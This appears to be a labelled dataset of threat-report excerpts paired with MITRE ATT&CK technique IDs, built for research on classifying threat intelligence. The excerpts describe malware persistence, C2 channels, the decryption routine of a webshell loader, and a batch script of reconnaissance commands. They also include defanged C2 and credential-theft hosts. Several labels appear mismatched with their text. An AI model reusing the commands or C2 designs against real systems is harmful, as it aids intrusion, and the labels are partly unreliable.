{"text1":"Tweets by second account @dookhtegan1 providing a Telegram channel with the leaked files\nData Dump Contents\nThe contents of the data dump includes various types of datasets that appear to be results from reconnaissance activity, initial compromises, and tools the OilRig operators use against target organizations","labels":"['T1003', 'T1041']"}
{"text1":"Unpacking routine for SWF exploit\nThe exploit is a memory corruption vulnerability that exists in the \u201ccom.adobe.tvsdk.mediacore.BufferControlParameters\u201d class. If the exploit is successful, it will gain arbitrary read \/ write operations within memory, thus allowing it to execute a second stage shellcode","labels":"['T1068', 'T1203']"}
{"text1":"Upon execution, the \u201cWindows Folder.exe\u201d file copies itself to C:\\Users\\<username>\\AppData\\Roaming and creates a Windows shortcut (LNK) file in the victim\u2019s Startup directory as a persistence mechanism","labels":"['T1074', 'T1547.009']"}
{"text1":"Upon execution, this command extracted, decrypted, and executed the PowerShell backdoor payload stored in the HiveUploadTask text property of the RacTask class","labels":"['T1140', 'T1059.001']"}
{"text1":"Variable Name | Description\ngdu | Google Drive URL for downloading files to the Google Drive account\ngduu | Google Drive URL for uploading files to the Google Drive account\ngdue | Google Drive URL for updating a file on the Google Drive account\ngdo2t | Google Drive URL used to get the OAUTH access_token\nclient_id | The client_id for the OAUTH application\ncs | The client_secret for OAUTH\nr_t | The refresh_token for OAUTH\nTable 6 Variables used to store settings needed to use Google Drive as a C2\nTo obtain an OAUTH access token to authenticate to the actor provided Google account, the Trojan sends an HTTP POST request to a URL stored in the gdo2t variable with grant_type, client_id, client_secret, and refresh_token fields added to the HTTP header and in the POST data","labels":"['T1102']"}
{"text1":"Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious attachments","labels":"['T1598.003', 'T1189']"}
{"text1":"Watch on\u00a0Fox News: Hackers may use fake Netflix app to spy on\u00a0users As users have become more attached to their mobile devices, they want everything on those devices","labels":"['T1120', 'T1087']"}
{"text1":"We are still analyzing this Trojan to determine the specific structure of the data sent between the Trojan and the C2 server; however, it does appear that the Trojan is using the RC4 algorithm to encrypt data sent to the C2 server within HTTP POST requests","labels":"['T1573', 'T1041']"}
{"text1":"We are unsure of the shellcode hosted at this URL, but it is possible that additional shellcode-based payloads like Meterpreter could have been served by this shellcode","labels":"['T1064', 'T1105']"}
{"text1":"We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell:\nAppend a string to the password that acts as a salt\nObtain the SHA1 hash of the resulting string containing the password and salt\nBase64 encode the SHA1 hash\nCompare the encoded hash with hardcoded base64 string\nIf the encoded hash matches hardcoded base64 string then the inbound request is authenticated\nGenerates the SHA256 hash of the password string\nBase64 encodes the SHA256 hash and uses the first 24 characters as a key\nUses 24-character key and the 3DES cipher to decrypt the embedded webshell\nNow let\u2019s look at how this works with the values in the TwoFace++ loader sample","labels":"['T1573', 'T1140', 'T1027', 'T1550.002', 'T1132']"}
{"text1":"We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script","labels":"['T1562.001', 'T1027']"}
{"text1":"We have gathered three samples of the default loader associated with this group and extracted the following configurations:\nSHA256 of Sample | Configuration\n82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190 | LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019]\ndb453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f | LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019]\n7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73 | LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018139.59.46[.]154:3543\u2019, \u2018-t\u2019, \u2018obfs3\u2019]\nThese configurations show that this group uses both fully-qualified domain names and IP addresses to host their Pupy C2 servers","labels":"['T1016', 'T1102', 'T1008']"}
{"text1":"We have observed the following capabilities of this payload:\nGet drive information\nRead files\nWrite files\nDelete files\nMove files\nSpawn processes\nCreate directories\nReaver TCP Payload\nThe malicious CPL payload of Reaver has the following three exported functions:\nServiceMain\nCPlApplet\nDllEntryPoint\nWhen the malware is initially loaded, DllEntryPoint will be called, which in turn will call a function that is responsible for decompressing a blob of data","labels":"['T1005', 'T1070.004', 'T1083']"}
{"text1":"We observed the threat group issue the following commands:\n@echo off\ndir c:\\ >> %temp%\\download\nipconfig \/all >> %temp%\\download\nnet user >> %temp%\\download\nnet user \/domain >> %temp%\\download\nver >> %temp%\\download\ndel %0\n\n@echo off\ndir \"c:\\Documents and Settings\" >> %temp%\\download\ndir \"c:\\Program Files\\\" >> %temp%\\download\nnet start >> %temp%\\download\nnet localgroup administrator >> %temp%\\download\nnetstat -ano >> %temp%\\download\nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs","labels":"['T1007', 'T1105', 'T1059.001']"}
{"text1":"We\u2019ve seen two onion addresses used in different samples:\ng5wcesdfjzne7255.onion (Down)\nr2elajikcosf7zee.onion (Alive at time of writing)\nThe HTTP resource always starts with \/api\/osx\/ and contains actions such as:\n\/api\/osx\/started to report the bot has just started\n\/api\/osx\/keychain to exfiltrate the content of the keychain\n\/api\/osx\/get_task?bot_id={botid}&version={version} to request a task (described below)\n\/api\/osx\/cmd_executed to report the output of a command that was executed\n\/api\/osx\/task_complete?bot_id={botid}&task_id={taskid} to report a task was completed\nHTTP POST content has two fields: bot_id and data","labels":"['T1071', 'T1106']"}
{"text1":"When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order","labels":"['T1071', 'T1008']"}
{"text1":"When comparing the provided timestamps of the delivery documents to the timestamps for the remote template documents from Table 2, we find that the time to attack is directly correlated to the last time the templates are modified","labels":"['T1070.006', 'T1124']"}
{"text1":"When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named \u201cvmtoolsd.\u201d Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name \u2018MSASCuiLTasks\u2019 in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence","labels":"['T1057', 'T1547.001']"}
{"text1":"When generating the URL for the HTTP requests issued to the C2 server, the Trojan chooses a random folder from the following to include within the URL path: watch\/? search\/? find\/? results\/? open\/? search\/? close\/? XAgent also will choose several parameters names from the following list when finishing the construction of the C2 URL: itwm= text= from=","labels":"['T1071', 'T1083']"}
{"text1":"When one PlugX succeeds to infect a host, it then accesses to every IP address in the local network one-by-one and communicate with any connectable nodes, using one of the following protocols listed in Table 2","labels":"['T1016', 'T1008']"}
{"text1":"When the actor modifies the file and changes the modification_time, the Trojan downloads the contents from the file by creating an HTTP request to a URL structured as follows: <Google Drive URL in \u2018gdu\u2019> + <file identifier in \u2018f_id\u2019> + \u201c?alt=media\u201d The Trojan processes the downloaded data within the file the same way it would to obtain a job from data received from the DNS tunneling channel using the TXT query mode, specifically by searching the data using the following regular expression: ([^r-v\\\\s]+)[r-v]([\\\\w\\\\d+\\\\\/=]+).(<domainList[0]>|<domainList[1]>|<domainList[n]>) The Trojan function splits the matching data, specifically the subdomain on a separator that is a character between r and v and uses the data before the separator to get the sequence number and a Boolean value (0 or 1) if more data is expected","labels":"['T1074', 'T1041', 'T1048', 'T1486']"}
{"text1":"While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries.\nFollowing these changes, the new developer of HawkEye Reborn has continued to make changes and we expect this to continue as long as the developer can monetize their efforts.\nAs with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or \"for educational purposes,\" malicious attackers have been continuously leveraging it against various targets around the world.\nDistribution campaigns\nFor several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger\/stealer","labels":"['T1518.001', 'T1018']"}
{"text1":"Year | Country | Industry | Malware\n2014 | Vietnam | Network Security | WINDSHIELD\n2014 | Germany | Manufacturing | WINDSHIELD\n2015 | Vietnam | Media | WINDSHIELD\n2016 | Philippines | Consumer products | KOMPROGO WINDSHIELD SOUNDBITE BEACON\n2016 | Vietnam | Banking | WINDSHIELD\n2016 | Philippines | Technology Infrastructure | WINDSHIELD\n2016 | China | Hospitality | WINDSHIELD\n2016 | Vietnam | Media | WINDSHIELD\n2016 | United States | Consumer Products | WINDSHIELD PHOREAL BEACON SOUNDBITE\nTable 1: APT32 Private Sector Targeting Identified by FireEye\nAPT32 Interest in Political Influence and Foreign Governments\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013","labels":"['T1068']"}
{"text1":"\u0627\u0633\u062a\u0637\u0644\u0627\u0639.docx https:\/\/0utl00k[.]net\/docs Table 1 Additional DarkHydrus Word documents used to steal credentials Both of these related documents use the attachedTemplate technique to steal credentials by sending them to a URL https:\/\/0utl00k[.]net\/docs","labels":"['T1003', 'T1552.001']"}